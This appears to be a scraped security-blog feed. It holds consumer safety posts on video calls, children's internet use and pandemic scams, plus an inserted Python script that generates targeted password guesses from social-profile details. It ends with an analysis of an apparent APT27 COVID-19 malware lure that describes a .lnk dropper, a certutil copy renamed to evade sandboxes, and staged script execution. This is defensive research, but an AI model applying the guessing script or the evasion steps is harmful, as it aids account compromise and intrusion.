This is the most important choice: indeed it is quite easy to change a monitor or a mouse, but changing your PC is much more challenging (and expensive). Depending on what you do on a daily basis you have many, many choices. So let's start from mobility. In my case I move a lot between my offices, and wherever I go I usually have external monitors, so I prefer small laptops. My principal tasks are split between malware analysis (mostly for fun) and management (mostly for work), so I need many virtual machines (mostly for fun) and many Chrome tabs (mostly for work). High performance in terms of SSD, CPU and RAM is required (virtualization and malware analysis tool sets). If you are a podcaster or a YouTuber you would need a high-performance graphics processor (especially if you post-process video); if you are a writer you would probably love to write “around the globe” (not in a small cold office), so you would love a light laptop; or if you are a developer or content designer you would probably love a Mac 😀 (just kidding). My favorite so far is the Razer Blade Stealth 13″, which has incredible performance: touchscreen and retina display, an i7, 16GB of RAM and a 500GB SSD. Generally speaking, if you are looking for a PC and not for a Mac I would definitely suggest taking a look at one of the following tiny but powerful laptops: Dell XPS 13, HP Spectre and ASUS ZenBook.

Headphones

If you are a music lover, well, you'd better skip this section. I don't use headphones for high-quality music listening but rather for conferences and calls. However, from time to time I love focusing by listening to my favorite playlist, so I had to figure out what, in my personal point of view, could be a good arrangement. My best compromise was the Jabra Move. If you don't need music (or if you have separate headphones for listening to music), having two “covered” ears (in terms of stereo) could be quite annoying, since it's not so natural talking without the right feel of your natural voice (with stereo headphones your voice is quite muffled). On the other hand, if you want to listen to music you definitely cannot do it with a mono headset. The Jabra Move seems to have nice sound quality and a nice integrated microphone, so that you could easily switch between conferences and music without changing hardware.

Software

First of all, let me explain why I am crazy about window managers. When you get into the productivity world, having a well-configured system with personal shortcuts is not only a way to speed up the boring tasks (opening windows, resizing windows, creating multi-desktop environments, opening up the usual web pages for reading, downloading stuff and placing it in the right folder, saving bookmarks, etc.), it is actually a way to organize your entire day. As many patterns are available for email management (I prefer the inbox-zero pattern, even if I don't truly succeed in using it), many are available for virtual desktop management. While I used to manage virtual desktops by functionality (and this works pretty well on macOS systems), on my Linux box I prefer keeping virtual desktops by project. So yes, I do have many duplicated applications running, each specialized on a specific topic. Questionable, I know... but in this way I feel much more confident, since I prefer to classify my work into projects rather than by functionality over multiple virtual environments. Anyway, a great window manager would definitely help you out. I've always been fascinated by the i3 tiling window manager, but I was always skeptical in the startup phase: on one hand the time to become fluent in i3 and on the other hand the installation procedure and configuration time were kind of killing me. But recently I met Regolith, which changed the way I think about window managers. Today I would definitely suggest you try it, at least for one week.

While a lot of to-do list software is available out there, I prefer the simple Todo.txt. It is damn simple, you can access it from multiple devices, it has a command line, it can manage priorities and... it has a command line!! (did I already mention that?). If you are a more “web oriented” guy, I would suggest Trello-CLI, but really nothing more than that.

One of my favorite editors is VIM. But I am not an “old school guy”, I just love the many, many plugins available for it and how you can transform it!

VIM Configuration

Once you've learned to master VIM you won't need any other editor ever: VIM is everywhere and you can customize it in a very quick way. If you like how my VIM looks, HERE is my configuration file; feel free to grab and use it if you wish.

Conclusion

I don't think there is a definitive setup. It will change over time depending on your needs. You might need electronic boards and soldering irons, or just a simple laptop. It really depends on what you are doing and on the deliverables you are working on. In this “unusual” (at least for my corner) post I wanted to answer the many questions on the “perfect home setup” that came to me in the past three weeks. Actually I have my “perfect” setup, which I've shared with you, but I am sure it will change over and over again, as it has changed a lot in the past few years. The only real suggestion I'd like to make is: “Less is More”. The fewer things you keep on your desk, the fewer distraction points you will have and the faster your deliverables will be.

Have fun and #StayAtHome

How Secure Is Video Conferencing?

As millions of people around the world practice social distancing and work their office jobs from home, video conferencing has quickly become the new norm. Whether you’re attending regular work meetings, partaking in a virtual happy hour with friends, or catching up with extended family across the globe, video conferencing is a convenient alternative to many of the activities we can no longer do in real life. But as the rapid adoption of video conferencing tools and apps occurs, is security falling by the wayside?  

Avoid Virtual Party Crashers

One security problem that has recently made headlines is the ability of uninvited attendees to barge into users’ virtual meetings. How? According to Forbes, many users have posted their meeting invite links on social media sites like Twitter. Because the invite link carries everything needed to join, an attacker can simply click on one of these links and interrupt an important conference call or meeting with inappropriate content.

Ensure Data is in the Right Hands

Online conferencing tools allow users to hold virtual meetings and share files via chat. But according to Security Boulevard, communicating confidential business information quickly and privately can be challenging with these tools. For example, users are not always immediately available, even when working from home. In fact, many parents are simultaneously doubling as working parents and teachers with the recent closure of schools and childcare providers. If a user needs to share private information with a coworker but is unable to connect by video or phone, they might revert to using a messaging platform that lacks end-to-end encryption, the feature that prevents anyone other than the sender and the recipient (the service provider included) from reading private messages. This could lead to leaks or unintended sharing of confidential data, whether personal or corporate. What’s more, using a messaging platform that is not secure could present a hacker with an opportunity to breach a victim’s data or device. Depending on the severity of this type of breach, a victim could be at risk of identity theft.

Pay Attention to Privacy Policies

With the recent surge of new video conferencing users, privacy policies have been placed under a microscope. According to WIRED, some online conferencing tools have had to update their policies to reflect the collection of user information and meeting content used for advertising or other marketing efforts. Another privacy concern was brought to light by a video conferencing tool’s attention-tracking feature. This alerts the virtual meeting host when an attendee hasn’t had the meeting window in their device foreground for 30 seconds, resulting in users feeling that their privacy has been compromised.  

How to Secure Video Conferences

As users become accustomed to working from home, video conferencing tools will continue to become a necessary avenue for virtual communication. But how can users do so while putting their online security first? Follow these tips to help ensure that your virtual meetings are safeguarded:  

Do your research

There are plenty of video conferencing tools available online. Before downloading the first one you see, do your research and check for known security vulnerabilities in the tools. Does the video conferencing tool you’re considering use end-to-end encryption? This ensures that only meeting participants can decrypt meeting content; encryption “in transit” alone still lets the service provider see it. Additionally, be sure to read the privacy policies listed by the video conferencing programs to find the one that is the most secure and fits your needs.

Make your meetings password protected

To ensure that only invited attendees can access your meeting, require a password to join. For maximum safety, activate passwords for new meetings, instant meetings, personal meetings, and people joining by phone, and share the link and password only with invitees, never on public channels.

Block users from taking control of the screen

To keep users (either welcome or unwelcome) from taking control of your screen while you’re video conferencing, select the option to block everyone except the host (you) from screen sharing.  

Turn on automatic updates

By turning on automatic updates, you will receive the latest security patches and enhancements for your video conferencing tool as soon as they are released, rather than relying on remembering to update by hand.

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post How Secure Is Video Conferencing? appeared first on McAfee Blogs.

Internet Safety for Kids: A Refresher for Homebound Families

Editor’s Note: This is part II of our internet safety for kids series. Part I focuses on younger children and can be read here.

Parents have always been concerned about keeping their kids safe online — especially their tweens and teens. That conversation is even more critical with parents and kids now working and learning at home. But as the days turn into weeks, the line between safe and risky digital behavior may get a little blurry. Maybe we can help by refreshing some basics.

Why is internet safety for kids important?

There’s no way around it. Young and old, over time, we’ve tethered nearly every aspect of our lives to the digital realm. If we want to work, bank, shop, pay bills, or connect with family and friends, we have to plug in. A wired life makes internet safety not just important, but mission-critical for parents.

Kids go online for school, to be entertained, and to connect with friends; only they don’t have the emotional maturity or critical thinking skills to process everything they will encounter on the other side of their screens.

That’s where proactive digital parenting comes in.

If our parenting goal is to raise wise, responsible, caring adults, equipped for real life, that goal must also include helping them safeguard their emotional and physical health from online risk. There’s no such thing as a digital platform or product that is 100% safe. So, our best strategy is to learn and pass on skills that mitigate that risk.

What are the dangers of the internet?

Any danger that exists offline is potentially multiplied when we log online due to the vast access the web affords each one of us. In a few clicks, we can unlock a world of possibilities. The flip side? There’s an ever-present battalion of crooks and bullies out to exploit that access. Online we will encounter the best and the worst of humankind. The daily threats to children include bullying, inappropriate content, predators, and the loss of privacy. Add to that list, digital viruses and malware, phishing scams, sharing regrettable content, and gaming addiction.

How can homebound kids avoid digital risk?

So what can we do to ensure the weeks ahead don’t bring more digital risk into our homes? We start by having consistent, candid conversations with our kids about online safety (even if eye-rolling begins). Truth: Your family’s cybersecurity is only as strong as the weakest security link in your family. If one family member is lax about internet safety, your entire family’s security is compromised.

So let’s get started with some internet safety basics to share with your tweens and teens. To read internet safety guidelines for younger children, click here.

11 Internet Safety Basics for Homebound Teens

  1. Get candid about content. Your tweens and teens have likely come across inappropriate material online. You can minimize further exposure by discussing expectations and family values around acceptable content — both sharing it and receiving it. Reminder: “Vanishing” Snapchats and deleted content can be easily captured in a screenshot — nothing shared online is private. For extra monitoring muscle, consider adding a parental control software to your family’s internet safety plan.
  2. Keep passwords, software, apps updated. Being homebound gives us all extra time for details. Go through personal and family devices and update all passwords. Keeping device software and apps updated also protects kids from outside risk.
  3. Balance life and tech. Kids can lose their entire day surfing, scrolling, and watching YouTube or TikTok videos. Establishing screen limits helps kids grow healthy tech habits. Consider scheduling device breaks, no-phone zones (dinner table, movie time, bedtime), and installing software that features time limits.
  4. Be a leader online. As the saying goes, with much power comes much responsibility. Many online dangers can be diminished by consistently teaching kids to be upstanders online. Practicing empathy, respect, tolerance, and compassion makes the digital world safer for everyone.
  5. Address peer pressure. Kids with devices can share unwise, personal photos with friends they trust. When friendships end, however, those photos can be shared or used for bullying or extortion. Discuss digital peer pressure with your child and how to respond.
  6. Look out for scams. Talk frequently about the many forms scams can take, such as phishing, malware, catfishing, fake news, and clickbait.
  7. Don’t friend strangers. Sexual predators create fake social media accounts specifically to befriend kids. In turn, kids share personal info, daily plans, location, and may even agree to meet in person with online friends. Discuss these risky scenarios and other manipulation tactics of predators with your child. Be aware of his or her friend circles, and look for chat apps such as WhatsApp or Kik.
  8. Maximize privacy on social profiles. Help kids maximize privacy settings on social profiles and delete any profile or post information that unintentionally gives away personal data. Consider removing the names of family members, pets, school, hometown, and birthdays. Hackers can piece together this information to crack passwords or create authentic-looking phishing scams.
  9. Consider a family VPN. Virtual Private Networks are a popular way to conduct business, shop, and keep a family’s online activity from being watched by others on the same network. VPN encryption hides traffic from the local network and the internet provider; it does not stop phishing, malware, or predators, so it complements rather than replaces the other items on this list.
  10. Review gaming safety. If your kids spend a lot of time on games like Fortnite and Call of Duty, they can encounter strangers, bullying, and scams that target gamers. Teen gamers should use a firewall to help block would-be attackers from gaining access to their PC and home network, as well as a comprehensive security solution to protect devices from malware and other threats.
  11. Monitor devices. Consider spot-checking all devices routinely. Review privacy settings on social networks (kids change them), look for new apps, review browsing history, chats, and texts. Need to go a step farther? Keep your child’s phone for a few hours to check notifications that pop up. You may find activity that wasn’t necessarily visible otherwise.
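
To make point 8 concrete, here is an added Python example (not from the original McAfee post) showing how a few details visible on a public profile turn into a small targeted password guess list, and a check a parent can run to see whether a child’s password is in it. The profile values, the suffix list and the candidate passwords are made up for the example; the combination rules are a simplified version of what targeted wordlist generators do.

```python
import itertools

# Constructed profile of the kind a public social account leaks: every value is made up.
PROFILE = {
    "first_name": "Emma",
    "pet": "Fluffy",
    "school": "Lincoln",
    "hometown": "Springfield",
    "sibling": "Liam",
    "birth_year": 2006,
}

# Decorations people add to a familiar word to satisfy "complexity" rules (assumed list).
SUFFIXES = ("", "!", "1", "123", "#")


def _casings(word):
    """The three spellings of a word that people actually type."""
    return (word.lower(), word.capitalize(), word.upper())


def build_wordlist(profile):
    """Candidate passwords derivable from the profile alone (simplified targeted-wordlist rules)."""
    words = [str(v) for k, v in profile.items() if k != "birth_year"]
    year = str(profile["birth_year"])
    years = ("", year, year[-2:])          # nothing, 2006, 06
    candidates = set()
    for w in words:                        # single profile word + year + suffix
        for spelled in _casings(w):
            for y in years:
                for s in SUFFIXES:
                    candidates.add(spelled + y + s)
    for a, b in itertools.permutations(words, 2):   # two profile words joined
        for s in SUFFIXES:
            candidates.add(a.capitalize() + b.capitalize() + s)
    return candidates


def is_guessable(password, profile):
    """True if the password is built only from information visible on the profile."""
    return password in build_wordlist(profile)


if __name__ == "__main__":
    wordlist = build_wordlist(PROFILE)
    print(f"{len(wordlist)} candidate passwords from {len(PROFILE)} profile fields")
    for pw in ("Fluffy2006!", "fluffy06", "EmmaLiam123", "correct horse battery staple"):
        print(f"{pw!r:35s} guessable={is_guessable(pw, PROFILE)}")
```

A few hundred candidates is nothing for an attacker, which is why “pet name plus birth year plus an exclamation mark” offers no real protection once those details are public; a password that is not built from profile facts at all (a long random passphrase from a password manager) is the fix.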

Taming all the moving parts of internet safety isn’t easy, and balancing your relationship with your child and parental monitoring can get turbulent at times. While kids can experience more drama and anxiety by going online, social networks remain critical channels for affirmation, self-expression, and connection. In the weeks to come, take time to listen, learn, and get to know your child’s digital passions and patterns. Identify safety gaps and reinforce those areas. Good luck, parents, you’ve got this!

The post Internet Safety for Kids: A Refresher for Homebound Families appeared first on McAfee Blogs.

Little Ones Online More? Here Are 10 Basics To Keep Them Safe

Online safety conversations look dramatically different depending on the age and stage of your child. For very young children, toddlers through elementary school, parents have a golden opportunity to lay the foundations that will shape a child’s digital perspectives and behaviors for a lifetime.

One way to keep younger children safe online is simply to begin. How early, you might ask? From the day they arrive. If you’ve ever seen a four-month-old reach for mommy’s smartphone only to cry when mommy takes it away, it’s clear the baby has observed the culture around him. He knows that the shiny toy that hums is one of mommy’s favorite things. It has the power to capture and hold her attention. It makes her laugh, cry, and influence her routine and emotions.

Protecting kids online

Modeling balanced screen habits is a powerful way to influence behavior as toddlers begin to discover television, apps, interactive toys, and online learning sites. At this stage, intentional steps such as limiting screen time, reviewing content, and talking with your little one in simple concepts about the images and stories they encounter will help grow their digital IQs. Note: The American Academy of Pediatrics (AAP) recommends keeping all screens turned off around babies and toddlers younger than 24 months.

Move With The Curve

As kids move into elementary school, technology is often part of the learning experience. Some children (depending on the household) may even own smartphones. Because the integration of technology begins to increase, this stage requires parents to move with the curve of a child’s online safety needs. Priorities at this stage: securing the devices kids take to school, setting filters on web browsers, limiting screen and gaming time, encouraging physical activity and hobbies, and having consistent, age-appropriate conversations about the online world. All of these are more important than ever.

10 Online Safety Basics for Younger Children

  1. Keep devices in a common area. By locating all computers, TVs, and devices in a common area, parents can easily monitor a child’s online activity. This simple step also helps kids get used to parental monitoring and responsible digital behavior.
  2. Follow family device rules. Establish family ground rules for technology use and repeat them to your younger children. Every child’s maturity and self-control level is different. If you think your child’s connection with his or her technology begins to tip toward the unhealthy, make adjustments as you go. If you set a 20-minute game time limit, be ready to enforce it consistently. In our experience, inconsistency in enforcing technology rules when kids are young is one of the biggest regrets among parents of teens.
  3. Introduce password security. As we accumulate IoT devices, it’s common for younger children to interact with home assistants, smart TVs, digital toys, and online games. When password prompts come up on a login screen, explain to your child what you are doing (using your password) and why passwords are necessary. Get into the habit of using 2-factor authentication on your accounts and locking your devices’ home screens with a PIN code.
  4. Filter content. Younger kids accept content at face value and don’t have the critical thinking skills to process information or to be alone online. If you allow younger kids online, consider sitting with them and explaining the content in front of them. To avoid the chance of your child encountering inappropriate content by mistake, consider adding parental control software to family devices.
  5. Start the privacy conversation. Kids of all ages understand the word “mine.” As your kids interact online in the early years, explain why it’s essential to keep their name, picture, family member names, school name, and address private.
  6. Introduce VPN use early. Browsing over a VPN (Virtual Private Network) from an early age reinforces the concept of privacy online. Explain to your child how your content (searches, activity, messages) passes through a private encrypted “tunnel” and how that keeps other people on the same network from grabbing your private information. Even a text conversation with Grandma could accidentally give away information.
  7. Explain the concept of scams. When age-appropriate, explain how (and why) some people online try to trick you into clicking a box or a link to learn more about you. Discuss why you shouldn’t click on pop-up ads, hyperlinks, and messages that could contain malware or phishing links. To guard family devices against malicious links, consider free tools like Web Advisor.
  8. Discuss digital stranger danger. When you open a web browser, you open your home to content and people you don’t know. Children of any age can inadvertently run into digital danger zones. Teach young children not to talk to a stranger online or send (or share) photos with others. It’s also a good idea to cover the camera lens on your laptop or tablet, advise children to never stay on a website you would not approve of, and to never download or click a link without asking your permission.
  9. Introduce safe social networking. Online communities are here to stay, so consider starting social network safety talks early. Several kid-friendly browsers, apps, and social networks exist online for younger kids and are perfect for teaching them about privacy settings, how to collaborate and interact with others online.
  10. Start talking. Keep talking. Of all the principles we’ve featured, we’ve saved the best for last. Creating an open, trusting dialogue with your child is your #1 security tool in keeping your child safe online today and into the future.

While schools introduce kids to internet safety basics to protect kids online and do well to refresh concepts along the way, it’s the consistent, intentional work of parents that shape the values and skills a child needs to navigate the online world. By putting some of these foundational principles in place early and committing to consistent follow-through, it’s possible to maintain critical influence as your children move into different phases of their digital lives.

The post Little Ones Online More? Here Are 10 Basics To Keep Them Safe appeared first on McAfee Blogs.

Scams Facing Consumers in the New Digital WFH Landscape

With many people having their normal day-to-day life turned upside down, scammers are capitalizing on consumers’ newfound lifestyles to make a financial gain or wreak havoc on users’ devices. Let’s take a look at the most recent threats that have emerged as a result of the pandemic.

Fraudulent Relief Checks

On Wednesday, March 25, the Senate passed a relief bill that contains a substantial increase in unemployment benefits for Americans who have lost their jobs or have been furloughed due to the economic fallout from the pandemic. Financial scammers are likely to use this as an opportunity to steal money offered to Americans who are facing the negative economic effects of the pandemic, as these crooks could make consumers believe they need to pay money as a condition of receiving government relief. The Federal Trade Commission issued a warning to consumers to be on the lookout for fraudulent activity as the government implements these financial relief packages.

Map Used to Track Pandemic Used to Spread Malware

According to security researcher Brian Krebs, criminals have started using real-time, accurate information about global infection rates as bait to spread malware. In one scheme, an interactive dashboard created by Johns Hopkins University is being embedded in malicious websites (and possibly in spam emails) to spread password-stealing malware. Additionally, Krebs flagged a digital pandemic infection kit, which allows other criminals to purchase a bundled version of the map with the scammer’s preferred attack method.

Texts, WhatsApp, and TikTok Spread Falsehoods

Due to the nature of the rapidly evolving pandemic, criminals are taking advantage of the situation by spreading misinformation. As more communities are being ordered to shelter in place, misleading text messages announcing a national quarantine and claiming to come from the White House buzzed onto cell phones around the U.S. According to the Washington Post, the fraudulent text messages encouraged users to, “Stock up on whatever you guys need to make sure you have a two-week supply of everything. Please forward to your network.” These fake texts spread so widely that the White House’s National Security Council debunked the misleading claims in a Twitter post stating, “Text message rumors of a national #quarantine are FAKE. There is no national lockdown.” Communication apps like WhatsApp and social media platforms like TikTok have carried similar examples of this misinformation.

Robocalls Offering Free Test Kits and Low-Cost Health Insurance

On top of fraudulent messages floating around via SMS, WhatsApp, and TikTok, scammers are also using robocalls to spread misinformation around the global pandemic, especially as more users are at home and available to answer phone calls as a result of self-isolation. According to CNN, robocalls from more than 60 different phone numbers are falsely offering low-priced health insurance and free coronavirus test kits. Another type of robocall asks users to sign a petition to ban flights from China. Criminals are taking advantage of the fact that new information around the pandemic is constantly being released, presenting them with an opportunity to scam users by impersonating local and federal officials.

Stay Safe Online With These Tips

During this time of uncertainty, it can be difficult to decipher what is fact from fiction. When it comes to the potential online threats around the recent pandemic, here’s what you can do to stay protected:  

Only trust official news sources

Be sure to only trust reputable news sites. This will help you filter out fake information that is just adding to the noise across the internet.  

Don’t share your personal or financial data

Although financial relief checks are not yet a reality, know that the federal government will not ask you to pay fees or charges upfront to receive these funds. Additionally, the government will not call, text, or email you asking for your Social Security number, bank account, or credit card number.

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the pandemic, it’s best to proceed with caution and avoid interacting with the message altogether.  

Go directly to the source

If you receive information regarding the pandemic from an unknown user, go directly to the source instead of clicking on links within messages or attachments. For example, users should only trust the map tracking the pandemic’s spread found on the Johns Hopkins website. Using a tool like McAfee WebAdvisor can help users stay safe from similar threats while searching the web.
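
A concrete way to apply “go directly to the source” is to check where a link actually leads before trusting it. The following Python script is an added example (not part of the original McAfee post): it extracts links from a message, resolves the host the browser would really contact, and compares it against a short allowlist of official sources. The Johns Hopkins host is the real one named above; the other allowlisted hosts, the sample messages and every other link target are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Official sources to go to directly. coronavirus.jhu.edu is the real host of the
# Johns Hopkins map named in the post; the other two are assumed entries a family
# might add to its own allowlist.
TRUSTED_SOURCES = ("coronavirus.jhu.edu", "www.cdc.gov", "www.who.int")

# Constructed sample messages (not real scam texts); every host other than the
# JHU one is made up for the example.
SAMPLE_MESSAGES = [
    "Live map of cases: https://coronavirus.jhu.edu/map.html",
    "URGENT see the latest map https://coronavirus.jhu.edu.example-map.com/map",
    "Official tracker https://coronavirus.jhu.edu@203.0.113.5/map.exe",
    "Free test kits! Claim yours: https://free-tests.example/claim.",
]

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def extract_urls(text):
    """Every http(s) link in a message, minus trailing sentence punctuation."""
    return [u.rstrip(".,;:!?)") for u in URL_RE.findall(text)]


def host_of(url):
    """Host the browser really contacts: 'user@' prefixes, ports and paths are dropped."""
    host = urlparse(url).hostname or ""
    return host.lower().rstrip(".")


def is_trusted_host(host):
    """Exact match or a subdomain of a trusted host; substring matches do not count."""
    return any(host == t or host.endswith("." + t) for t in TRUSTED_SOURCES)


def classify_url(url):
    """'trusted', 'lookalike' (an official name appears but the host is not it) or 'untrusted'."""
    host = host_of(url)
    if is_trusted_host(host):
        return "trusted"
    lowered = url.lower()
    if (not host.isascii()                  # homoglyph / internationalised host
            or "xn--" in host               # punycode-encoded host
            or any(t in lowered for t in TRUSTED_SOURCES)):  # brand in user@, subdomain or path
        return "lookalike"
    return "untrusted"


def classify_message(text):
    """(url, real host, verdict) for every link in one message."""
    return [(u, host_of(u), classify_url(u)) for u in extract_urls(text)]


def flag_messages(messages):
    """Indexes of messages containing at least one link that is not an official source."""
    return [i for i, m in enumerate(messages)
            if any(v != "trusted" for _, _, v in classify_message(m))]


if __name__ == "__main__":
    for i, msg in enumerate(SAMPLE_MESSAGES):
        for url, host, verdict in classify_message(msg):
            print(f"message {i}: {verdict:9s} host={host:32s} {url}")
```

The third sample is the important one: the text before the `@` is not the host at all, so a message that visibly “contains” the Johns Hopkins address still sends the browser to a different machine. Matching on the real host, and only as an exact or subdomain match, is what makes the check meaningful.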

Register for the FTC’s National Do Not Call Registry

Registering keeps legitimate telemarketers from calling you, which makes any remaining unsolicited sales call far more likely to be a scam. The registry does not itself stop criminals, who ignore it, so still treat unexpected calls about relief money, test kits or insurance with suspicion.

The post Scams Facing Consumers in the New Digital WFH Landscape appeared first on McAfee Blogs.

Honey, We’re Home! Securing Your Devices and Your Family Bond

More and more parents and their kids are experiencing what it’s like to work and learn together from home these days. With this increase in device use, it’s more important than ever to verify that all the technology humming under your roof is as secure as possible.

Securing family technology

Run an overall security check. Taking an inventory of all your family’s connected devices and their security should be as important as keeping your doors locked and keeping batteries in your smoke alarms — your family’s safety depends on it. Consider installing a comprehensive security solution across all devices. This will help protect your family against malware, viruses, phishing attacks, and alert you to malicious websites. As part of your security check, be sure to update the software on all devices, including IoT products, TVs, and toys.

Review parental controls. There's no way around it. Device use will likely skyrocket under your roof for a while. Kids will be online for school, as well as for fun. You may have turned on some filtering on some devices and some social networks, but it may be time to bring on an extra set of eyes and ears with comprehensive filtering software. With increased tech use, parental controls will help monitor your child's digital activity. Also, with a new work-at-home lifestyle, the software (with time limits) can make scheduling family breaks together much more manageable.

Secure your home router. Your router is akin to your family's front door, and now is a great time to change the locks (your passwords) on this critical entryway into your home. If you are reluctant to change your passwords or think it's a hassle, consider the simplicity of a password manager. A password manager makes passwords easy to change and easy to keep track of, which boosts overall security. If you are working from home, make sure your home network aligns with your company's security expectations. For specifics on business security, read this post on working securely from home.

Introduce a VPN (Virtual Private Network). If you’ve toyed with the idea of a VPN but just haven’t made a move, now is a great time. While you may not venture into public spaces much at the present moment, a VPN will add a significant layer of security on your devices if you take a break and go to a public park or if your kids need to go online while at a friend’s. Explain VPN benefits to your kids and how to log on. It’s easy, it’s smart, and it’s secure.

Securing your family bond

Create a schedule that works for everyone. Your home network is likely working on overdrive by now. With the extra online schooling, devices, and video calls taking place, your bandwidth may start to lag. This is because residential internet doesn’t rival business internet. Discuss a schedule for online time and the challenge of accomplishing mutual deadlines each day. Respect and honor one another’s responsibilities. If you’ve never had the chance to talk about the specifics of your job and daily tasks, maybe this is your chance.

Acknowledge the stress of uncertainty. There are feelings — lots of feelings — that accompany change, and everyone’s response to it will vary. Shifting into an abrupt, new routine may feel confusing and confining to a child of any age and cause anxiety and emotions to run high. Talk through these feelings together as often as needed. Acknowledge your child’s losses — connection with teachers, sports, friends, events — and offer empathy and support.

Explore new possibilities — together. No doubt, considerable shifts in a family’s routine can be stressful. Even so, there’s opportunity woven throughout every challenge. With some extra time management, it’s possible to discover some hidden opportunities and adventures along the way. Hiking, canoeing, and exploring the outdoors could become a new love for your family. Watching movie classics together, learning a new skill online, building something, or tackling overdue projects together may open up a new, shared passion. Endless possibilities await.

Balance work, health, and family. Nothing will undermine your efforts to work from home more than a skewed work-life (or school-life) balance (yes, kids can go overboard too)! A recent study shows that remote workers are more productive than office workers and spend more time at their desks. For balance, consider setting firm office/school hours (for both you and the kids), taking exercise breaks throughout the day, and getting an accountability partner to help you stay on track. And, don't forget — lots of eyes are watching you always — so modeling work-life-and-technology balance for your kids is teaching them that same value.

It's a new frontier, parents, but with the right tools and the proper support around you, anything is possible. Stay healthy, stay happy, and stay secure in this new remote family adventure.

The post Honey, We're Home! Securing Your Devices and Your Family Bond appeared first on McAfee Blogs.

Fake Coronavirus tracking app exploiting our fear and vulnerable social situation

As the Coronavirus spreads across countries creating fear across the globe, everybody wants to stay on top of any information related to it, wanting to remain safe and away from infected people. Malware authors are also taking advantage of this situation. Previously on the Android Play Store, there were many applications present which claimed…

Is APT27 Abusing COVID-19 To Attack People ?!

Scenario

We are living through a hard time: many countries all around the world have been hit by COVID-19, which has proven to be a very dangerous disease. Unfortunately there have been many deaths, thousands of infected people, too little breathing equipment, billions of dollars burned on the stock markets, and a lot of companies are entering an economic and financial crisis. Governments are doing their best to mitigate the virus while people are stuck at home working remotely with their own equipment.

In that scenario, jackals are luring people with every dirty trick in order to attack their private devices. At home it is hard to have the advanced protection systems we have in companies: Intrusion Prevention Systems, proxies, advanced threat protection, automated sandboxes and advanced endpoint protection are rarely available, which leaves personal devices more vulnerable to attack. In this reality, ruthless attackers abuse the situation to attack digitally unprotected people.

Today many reports describe how infamous attackers are abusing this emergency to lure people, by sending thematic email campaigns or by using thematic instant messages carrying malware or phishing links. A few of them that I believe make for nice reading follow:

Today I want to contribute to that blog-roll by analyzing a new spreading variant that hit my observatory. I want to "spoil" the conclusions now: it is pretty sad that an APT group makes use of its knowledge to take advantage of today's situation.

Stage 1

The first stage is a fake PDF file. It looks like a real PDF, it has a hidden extension and a nice PDF icon, but it really isn't a PDF: it is actually a .lnk file, or in other words a "Microsoft Linking File".

Sha256: 95489af84596a21b6fcca078ed10746a32e974a84d0daed28cc56e77c38cc5a8
Threat: Dropper and Execution
Ssdeep: 24576:2D9JuasgfxPmNirQ2dRqZJuH3eBf9mddWoX+KIKoIkVrI:2DzuOxPm0iZLKIKRkq
Description: Fake PDF file used to run initial infection chain

Opening the .lnk file, we notice a weird linking pattern made of two main sections: one is a kind of header in which it is possible to observe commands, and the other is a big encoded payload.

.lnk file

Once the first section is beautified, it becomes easier to understand what it does. It basically copies itself into a temporary folder (through cmd.exe), extracts bytes from its body (from section two), decodes those bytes from Base64 (through msoia.exe) and places the extracted content into the temporary user folder. It then deflates the content (through expand) and finally executes a JavaScript file (through wscript) that was included in the compressed content. The following image shows the beautified code section of the analyzed file.

Beautified .lnk file

It is quite nice to see how the attacker copied certutil from the local system by using the wildcard pattern (*ertu*.exe) in order to avoid command-line detection by public sandboxes. Indeed many sandboxes have signatures on certutil, since it is quite a notorious tool used by some attackers, so avoiding the behavioural signature match earns the sample a lower score from public sandboxes.

Stage 2

Stage 1 carves Stage 2 out of its own body by extracting the bytes and base64-decoding them. The new stage is a Microsoft compressed CAB file, described in the following table.

Sha256: f74199f59533fbbe57f0b2aae45c837b3ed5e4f5184e74c02e06c12c6535f0f9
Threat: Malware Carrier/Packer/Compressor
Ssdeep: 24576:CkL6X/3PSCuflrdNZ4J00ZcmNh3wsAR36Mge:vLK/fS200ZcYh3kqpe
Description: Microsoft CAB bringing contents

Extracting the files from the Microsoft CAB, we observe 6 more files entering the battlefield:

  • 20200308-sitrep-48-covid-19.pdf. The original PDF from WHO explaining the COVID-19 status and how to fight it.
  • 3UDBUTNY7YstRc.tmp. PE32 Executable file (DLL)
  • 486AULMsOPmf6W.tmp. PE32 Executable (GUI)
  • 9sOXN6Ltf0afe7.js. Javascript file (called by .lnk)
  • cSi1r0uywDNvDu.tmp. XSL StyleSheet Document
  • MiZl5xsDRylf0W.tmp. Text file including PE32 file

Stage 1 executes the JavaScript included in the CAB file. 9sOXN6Ltf0afe7.js performs an ActiveXObject call to WScript.Shell in order to execute a list of Windows commands. Once "deobfuscated" and beautified, the command line looks like the following (9sOXN6Ltf0afe7.js payload beautified). The attacker creates a folder that looks like a "file" by naming it cscript.exe, trying to fool the analyst, and then populates that folder with the files needed to continue the infection chain.

9sOXN6Ltf0afe7.js payload “deobfuscated”

A special thought goes to WINRM.VBS, which helped the attacker perform Signed Script Proxy Execution (T1216). According to Microsoft: "WINRM is the CLI interface to our WS-MGMT protocol. The neat thing about this is that you can call it from PowerShell to manage remote systems that don't have PowerShell installed on them (including Server Core systems and Raw hardware)." The attacker also places a file called Wordcnvpxy.exe in the OFFICE12 folder. We will analyze it in a few steps, but at this stage we can already observe that it is the "last call" before the victim is lured by being shown the genuine PDF file (also included in the CAB). According to 9sOXN6Ltf0afe7.js, however, the first thing run is WsmPty.xsl, which is the renamed version of cSi1r0uywDNvDu.tmp.

Stage 3

Stage 3 is run by Stage 2, and it is an XSL (stylesheet) file wrapping a VBScript object.

Sha256: 9d52d8f10673518cb9f19153ddbe362acc7ca885974a217a52d1ee8257f22cfc
Threat: Payload Extractor and Command Executor
Ssdeep: 96:46Pdv3fOYCeeapSCDIKufYS2VGsBu746WJCSmCZyAcGghF:fh3fOYneaLDIgnNEFCZyAcGsF,
Description: Decode Additional Stage by using coding charsets and XOR

The following VBScript is run through cscript.exe. It is an obfuscated and XOR-encrypted payload. The encryption is a simple XOR using the single byte 0 as key, while the encoding procedure is a multi-step conversion routine that can be summarized as follows:

chr(asc(chr(“&h”&mid(x,y,2))))

VBScript Stage3

